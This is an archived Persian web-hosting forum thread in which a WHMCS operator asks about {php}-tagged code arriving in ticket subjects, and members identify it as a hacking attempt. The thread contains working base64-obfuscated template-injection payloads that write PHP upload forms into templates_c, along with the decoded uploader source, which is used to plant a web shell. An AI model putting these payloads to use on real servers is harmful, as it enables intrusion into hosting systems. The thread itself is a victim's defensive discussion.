PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : این کد معنیش چیه



hannah
December 30th, 2011, 07:11
سلام
یکی اومده این کد رو ازه روی سابجکت این کد چه کاری انجام میده ؟
{php}echo('bbbb');exit;{/php}

iraniandata
December 30th, 2011, 09:18
سلام

مطمئنید نوشته درسته؟

این نبود؟

<?php echo("bbb"); exit ?>

ادامش باید دید چیه ولی من فکرمی کنم فقط bbb رو تو صفحه نشون میده البته ادامش هم مهمه شاید هم یه چیز دیگه باشه

Rezash
December 30th, 2011, 10:20
سلام
ميخواسته تست كنه ببينه باگ روي سايتتون اگر فعال هست شل بريزه !

هاست 97
December 30th, 2011, 10:56
قبل از چک کردت تیکت ، ایمیلتون رو چک کنید

نوعی حرکت برای هک هست با آپلود شل و ...

iraniandata
December 30th, 2011, 11:51
سلام

به احتمال هکر بوده و به نظرم جزء جوجه هکرا بوده چون از روشی داره هک میکنه که راحت طرف شناسائی میکنه

به نظرم سریع موارد امنیتی درنظربگیر و انجام بده

camelian77
December 30th, 2011, 12:21
اگر سیستم WHMCS هست می‌خواسته اقدام به هک کنه. بن کنید و با همین کارهایی که در فروم گفته شده سیستم رو secure کنید.

اون تگ های {php} برای قالب های WHMCS معنی دارن و به صورت <?php eval ( ؟> >؟ )؟> تفسیر می‌شن

om!d-D
December 30th, 2011, 14:03
آقا وقتی از بخش کنترل اسپم سابجکت رو با عبارات گفته شده بن میکنم بازهم جلوگیری نمیکنه و همون کدها توی سابجکت ارسال میشه....دلیلش چیه؟ از همونا باید اقدام کرد؟

sardarn
December 30th, 2011, 14:08
کلیه کارهایی که در اینجا گفته شده انجام بدید

http://www.webhostingtalk.ir/f177/36031/

om!d-D
December 30th, 2011, 15:54
از بخش کنترل اسپم وارد میکنم اما بازم تیکت ها با همون کد راحت ارسا میشن...مگه نباید اججازه نده دیگه اون کد ارسال بشه؟ من حتی php وارد کردم اما نشد

sardarn
December 30th, 2011, 15:59
شما تمام کارهایی که توی اون تاپیک هست رو انجام بدید کافیه فعلا
توی اسپم کل کد رو بزنید

om!d-D
December 30th, 2011, 16:46
عزیز منم دارم میگم کد رو کامل میزنم و به راحتی مجدد ارسال میشه...یعنی انگار کد رو فیتر نمیکنه اصلا..منم همین واسم عجیبه

hannah
December 30th, 2011, 17:51
من لایسنس خریدم و به آخرین ورژن آپدیت شده و هیچ کاری نمیتونن کنند :d ولی میدن بازن حالا اینو چجوری میشه دیکد کرد و کی میتونه دیکد کنه ببینیم چه کار میخواستن کنند که نتونستن :d

{php}evaL(base64_decode('JGZoMiA9IGZvcGVuKCJ0ZW1wb GF0ZXNfYy9odGFjY2Vzcy5waHAiLCJ3Iik7IA0KZnB1dHMoJGZ oMiwgIjw/IGV2YWwoYmFzZTY0X2RlY29kZShcIkpHUnZZM0lnUFNBa1gxTk ZVbFpGVWxzblJFOURWVTFGVGxSZlVrOVBWQ2RkT3cwS1pXTm9i eUE4UER4SVZFMU1EUW84ZEdGaWJHVStQR1p2Y20wZ1pXNWpkSG x3WlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTSWdZV04w YVc5dVBTSWtjMlZzWmlJZ2JXVjBhRzlrUFNKUVQxTlVJajROQ2 p4cGJuQjFkQ0IwZVhCbFBTSm9hV1JrWlc0aUlHNWhiV1U5SW1G aklpQjJZV3gxWlQwaWRYQnNiMkZrSWo0TkNqeDBjajQ4ZEdRZ2 QybGtkR2c5SWpRNElqNDhabTl1ZENCemFYcGxQU0l4SWo1WmIz VnlJRVpwYkdVNklEd3ZabTl1ZEQ0Z1BDOTBaRDROQ2p4MFpEND hhVzV3ZFhRZ2MybDZaVDBpTkRnaUlHNWhiV1U5SW1acGJHVWlJ SFI1Y0dVOUltWnBiR1VpSUQ0OEwzUmtQand2ZEhJK0RRbzhkSE krUEhSa0lIZHBaSFJvUFNJME9DSStQR1p2Ym5RZ2MybDZaVDBp TVNJK1ZYQnNiMkZrSUVScGNqb2dQQzltYjI1MFBqd3ZkR1ErUE hSa1BnMEtQR2x1Y0hWMElITnBlbVU5SWpRNElpQjJZV3gxWlQw aUpHUnZZM0l2SWlCdVlXMWxQU0p3WVhSb0lpQjBlWEJsUFNKMF pYaDBJaUErRFFvOGFXNXdkWFFnZEhsd1pUMGljM1ZpYldsMElp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwzUmtQand2Wm05eWJUND hMM1JoWW14bFBnMEtKSFJsYm1RTkNraFVUVXc3RFFwcFppQW9h WE56WlhRb0pGOVFUMU5VV3lkd1lYUm9KMTBwS1hzTkNpUjFjR3 h2WVdSbWFXeGxJRDBnSkY5UVQxTlVXeWR3WVhSb0oxMHVKRjlH U1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwN0RRcHBaaUFvSk Y5UVQxTlVXeWR3WVhSb0oxMDlQU0lpS1hza2RYQnNiMkZrWm1s c1pTQTlJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZE 8zME5DbWxtSUNoamIzQjVLQ1JmUmtsTVJWTmJKMlpwYkdVblhW c25kRzF3WDI1aGJXVW5YU3dnSkhWd2JHOWhaR1pwYkdVcEtTQj dEUW9nSUNBZ1pXTm9ieUFpUm1sc1pTQjFjR3h2WVdSbFpDQjBi eUE2SUNSMWNHeHZZV1JtYVd4bFhHNGlPdzBLSUNBZ0lHVmphRz hnSWkwZ1UybDZaU0E2SUNJZ0xpUmZSa2xNUlZOYkoyWnBiR1Vu WFZzbmMybDZaU2RkTGlBaVhHNGlPdzBLZlNCbGJITmxJSHR3Y2 1sdWRDQWlSWEp5YjNJZ0p5QlZjR3h2WVdRZ1JtbHNaU0E2WEc0 aU8zMTlcIikpOyA/PiIpOw0KZmNsb3NlKCRmaDIpOw=='));{/php}

Rezash
December 30th, 2011, 17:58
من لایسنس خریدم و به آخرین ورژن آپدیت شده و هیچ کاری نمیتونن کنند :d ولی میدن بازن حالا اینو چجوری میشه دیکد کرد و کی میتونه دیکد کنه ببینیم چه کار میخواستن کنند که نتونستن :d

{php}evaL(base64_decode('JGZoMiA9IGZvcGVuKCJ0ZW1wb GF0ZXNfYy9odGFjY2Vzcy5waHAiLCJ3Iik7IA0KZnB1dHMoJGZ oMiwgIjw/IGV2YWwoYmFzZTY0X2RlY29kZShcIkpHUnZZM0lnUFNBa1gxTk ZVbFpGVWxzblJFOURWVTFGVGxSZlVrOVBWQ2RkT3cwS1pXTm9i eUE4UER4SVZFMU1EUW84ZEdGaWJHVStQR1p2Y20wZ1pXNWpkSG x3WlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTSWdZV04w YVc5dVBTSWtjMlZzWmlJZ2JXVjBhRzlrUFNKUVQxTlVJajROQ2 p4cGJuQjFkQ0IwZVhCbFBTSm9hV1JrWlc0aUlHNWhiV1U5SW1G aklpQjJZV3gxWlQwaWRYQnNiMkZrSWo0TkNqeDBjajQ4ZEdRZ2 QybGtkR2c5SWpRNElqNDhabTl1ZENCemFYcGxQU0l4SWo1WmIz VnlJRVpwYkdVNklEd3ZabTl1ZEQ0Z1BDOTBaRDROQ2p4MFpEND hhVzV3ZFhRZ2MybDZaVDBpTkRnaUlHNWhiV1U5SW1acGJHVWlJ SFI1Y0dVOUltWnBiR1VpSUQ0OEwzUmtQand2ZEhJK0RRbzhkSE krUEhSa0lIZHBaSFJvUFNJME9DSStQR1p2Ym5RZ2MybDZaVDBp TVNJK1ZYQnNiMkZrSUVScGNqb2dQQzltYjI1MFBqd3ZkR1ErUE hSa1BnMEtQR2x1Y0hWMElITnBlbVU5SWpRNElpQjJZV3gxWlQw aUpHUnZZM0l2SWlCdVlXMWxQU0p3WVhSb0lpQjBlWEJsUFNKMF pYaDBJaUErRFFvOGFXNXdkWFFnZEhsd1pUMGljM1ZpYldsMElp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwzUmtQand2Wm05eWJUND hMM1JoWW14bFBnMEtKSFJsYm1RTkNraFVUVXc3RFFwcFppQW9h WE56WlhRb0pGOVFUMU5VV3lkd1lYUm9KMTBwS1hzTkNpUjFjR3 h2WVdSbWFXeGxJRDBnSkY5UVQxTlVXeWR3WVhSb0oxMHVKRjlH U1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwN0RRcHBaaUFvSk Y5UVQxTlVXeWR3WVhSb0oxMDlQU0lpS1hza2RYQnNiMkZrWm1s c1pTQTlJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZE 8zME5DbWxtSUNoamIzQjVLQ1JmUmtsTVJWTmJKMlpwYkdVblhW c25kRzF3WDI1aGJXVW5YU3dnSkhWd2JHOWhaR1pwYkdVcEtTQj dEUW9nSUNBZ1pXTm9ieUFpUm1sc1pTQjFjR3h2WVdSbFpDQjBi eUE2SUNSMWNHeHZZV1JtYVd4bFhHNGlPdzBLSUNBZ0lHVmphRz hnSWkwZ1UybDZaU0E2SUNJZ0xpUmZSa2xNUlZOYkoyWnBiR1Vu WFZzbmMybDZaU2RkTGlBaVhHNGlPdzBLZlNCbGJITmxJSHR3Y2 1sdWRDQWlSWEp5YjNJZ0p5QlZjR3h2WVdRZ1JtbHNaU0E2WEc0 aU8zMTlcIikpOyA/PiIpOw0KZmNsb3NlKCRmaDIpOw=='));{/php}


<?php

$docr = $_SERVER['DOCUMENT_ROOT'];

echo <<<HTML

<table><form enctype="multipart/form-data" action="$self" method="POST">

<input type="hidden" name="ac" value="upload">

<tr><td width="48"><font size="1">Your File: </font> </td>

<td><input size="48" name="file" type="file" ></td></tr>

<tr><td width="48"><font size="1">Upload Dir: </font></td><td>

<input size="48" value="$docr/" name="path" type="text" >

<input type="submit" value="Upload"></td></form></table>

$tend

HTML;

if (isset($_POST['path'])){

$uploadfile = $_POST['path'].$_FILES['file']['name'];

if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}

if (copy($_FILES['file']['tmp_name'], $uploadfile)) {

echo "File uploaded to : $uploadfile\n";

echo "- Size : " .$_FILES['file']['size']. "\n";

} else {print "Error ' Upload File :\n";}}
فرم آپلود ! براي آپلود شل.

hannah
December 30th, 2011, 18:24
میبینن آخرین نسخه هستا هک نمیشه ولی بازم تست میکنن :d آقا رضا میشه بگید چجوری دیکد میکنید ؟

Rezash
December 30th, 2011, 18:35
میبینن آخرین نسخه هستا هک نمیشه ولی بازم تست میکنن :d آقا رضا میشه بگید چجوری دیکد میکنید ؟

obfuscate شدس ، بستگي داره تا چه حد با php آشنا باشيد تا بتونيد ديكد كنيد. اين كد دو مرحله كد شده بود ، كه كافي بود در هر مرحله جاي eval به يك متغير نسبت بديد و echo كنيد (يا روش مشابه مثل ذخيره در فايل)
بعضي روش هاي obfuscate پيچيده تر هستند و به اين راحتي نيست ، بعضي كه شناخته شدن رو ميشه با نرم افزار de obfuscate كرد

majid67
December 30th, 2011, 18:57
obfuscate شدس ، بستگي داره تا چه حد با php آشنا باشيد تا بتونيد ديكد كنيد. اين كد دو مرحله كد شده بود ، كه كافي بود در هر مرحله جاي eval به يك متغير نسبت بديد و echo كنيد (يا روش مشابه مثل ذخيره در فايل)
بعضي روش هاي obfuscate پيچيده تر هستند و به اين راحتي نيست ، بعضي كه شناخته شدن رو ميشه با نرم افزار de obfuscate كرد

البته بدون نیاز به دانش برنامه نویسی هم میشه!
Base 64 Decoder (http://www.opinionatedgeek.com/dotnet/tools/base64decode/)

در 2 مرحله کد بدست میاد:

$docr = $_SERVER['DOCUMENT_ROOT'];
echo <<<HTML
<table><form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr><td width="48"><font size="1">Your File: </font> </td>
<td><input size="48" name="file" type="file" ></td></tr>
<tr><td width="48"><font size="1">Upload Dir: </font></td><td>
<input size="48" value="$docr/" name="path" type="text" >
<input type="submit" value="Upload"></td></form></table>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "File uploaded to : $uploadfile\n";
echo "- Size : " .$_FILES['file']['size']. "\n";
} else {print "Error ' Upload File :\n";}}

hannah
December 31st, 2011, 06:52
اینا مارو ول نمیکنند

{php}eval(base64_decode('JGMzbyA9IGJhc2U2NF9kZWNvZ GUoIlBEOXdhSEFOQ21WamFHOGdKenhtYjNKdElHRmpkR2x2Ymo waUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW0xM WJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFaUlHNWhiV1U5SW5Wd2J HOWhaR1Z5SWlCcFpEMGlkWEJzYjJGa1pYSWlQaWM3RFFwbFkya HZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYm1GdFpUMGl abWxzWlNJZ2MybDZaVDBpTlRBaVBqeHBibkIxZENCdVlXMWxQU 0pmZFhCc0lpQjBlWEJsUFNKemRXSnRhWFFpSUdsa1BTSmZkWEJ zSWlCMllXeDFaVDBpVlhCc2IyRmtJajQ4TDJadmNtMCtKenNOQ 21sbUtDQWtYMUJQVTFSYkoxOTFjR3duWFNBOVBTQWlWWEJzYjJ Ga0lpQXBJSHNOQ2dscFppaEFZMjl3ZVNna1gwWkpURVZUV3lkb WFXeGxKMTFiSjNSdGNGOXVZVzFsSjEwc0lDUmZSa2xNUlZOYko yWnBiR1VuWFZzbmJtRnRaU2RkS1NrZ2V5QmxZMmh2SUNjOFlqN VZjR3h2WVdRZ1UxVkxVMFZUSUNFaElUd3ZZajQ4WW5JK1BHSnl QaWM3SUgwTkNnbGxiSE5sSUhzZ1pXTm9ieUFuUEdJK1ZYQnNiM kZrSUVkQlIwRk1JQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDB OQ24wTkNqOCsiKTsNCiRyZWQgPSBmb3BlbigidGVtcGxhdGVzX 2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkcmVkLCRjM28pOw= ='));{/php}

هک نمیتونن کنن ولی ولم نمیکنن نمیشه کاری کرد دیگه این پیام هاشون نیاد یا نتونن ارسال کنند ؟